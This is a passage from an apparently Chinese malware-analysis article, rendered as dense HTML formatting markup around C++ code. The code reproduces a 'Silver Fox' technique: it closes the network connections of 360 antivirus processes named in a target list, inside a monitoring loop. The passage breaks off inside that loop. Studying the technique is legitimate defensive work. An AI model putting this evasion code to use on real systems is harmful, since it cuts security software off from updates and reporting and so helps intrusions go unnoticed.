Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">}</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">            </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">else</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">{</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">                </span></span><span leaf="">wprintf</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">L&#34;</span><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">[!] Failed to close connection. Error code: </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;SpecialCharTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">%lu\n</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&#34;, result</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">);</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">            </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">}</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">}</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">}</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">if</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">closedCount </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&gt;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;DecValTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">{</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span><span leaf="">wprintf</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">L&#34;[=] Closed </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;SpecialCharTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">%d</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> connections for PID </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;SpecialCharTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">%lu\n</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&#34;, closedCount, pid</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">);</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">}</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">free</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">tcpTable</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">);</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">}</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;DataTypeTok&#39;;color: #902000;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">int</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> wmain</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;DataTypeTok&#39;;color: #902000;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">int</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> argc, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;DataTypeTok&#39;;color: #902000;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">wchar_t</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">*</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> argv</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">[])</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">{</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">std</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">::</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">vector</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&lt;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">std</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">::</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">wstring</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&gt;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> targetProcs </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">{</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">L&#34;360Tray.exe&#34;, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">L&#34;360Safe.exe&#34;, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">L&#34;LiveUpdate360.exe&#34;, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">L&#34;safesvr.exe&#34;, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">L&#34;360leakfixer.exe&#34;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">};</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">wprintf</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">L&#34;[*] Starting connection monitor...</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;SpecialCharTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">\n</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&#34;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">);</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">while</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 